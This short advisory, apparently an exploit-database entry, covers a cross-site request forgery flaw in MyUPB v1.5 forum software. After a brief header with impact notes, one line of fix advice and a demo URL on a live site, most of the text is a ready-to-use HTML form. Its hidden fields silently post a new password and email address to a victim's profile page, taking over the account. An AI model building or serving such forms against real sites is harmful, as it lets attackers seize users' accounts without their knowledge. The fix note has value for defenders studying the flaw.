< ------------------- header data start ------------------- >


#############################################################

# Application Name : MyUPB v1.5

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak user bilgileri degistirebilinir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : CW Bug Researchers Grup/CWCaspeR

# Demo : http://www.gislavedsguiden.nu/upb1.5/profile.php

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<form action=’http://HEDEFSITE.COM/SCRIPTYOLU/profile.php’ method=’post’>
<input type=’hidden’ name=’u_newpass’ value=’SIFRENIZ’>
<input type=’hidden’ name=’u_newpass2’ value=’SIFRENIZ’>
<input type=’hidden’ name=’u_email’ value=’EMAILINIZ’>
<input type=hidden name=show_email>
<input type=hidden name=email_list checked>
<input type=’hidden’ name=’u_loca’ value=’dasdasd’>
<input type=’hidden’ name=’avatar’ value=’images/avatars/noavatar.gif’>
<input type=’hidden’ name=’u_site’ value=’http://’>
<input type=’hidden’ name=’u_icq’ value=’’>
<input type=’hidden’ name=’u_aim’ value=’’>
<input type=’hidden’ name=’u_msn’ value=’’>
<textarea name=’u_sig’ cols=1 rows=1></textarea>
<input type=’submit’ name=’u_edit’ value=’BUTONADI’>
</form>

< -- bug code end of -- >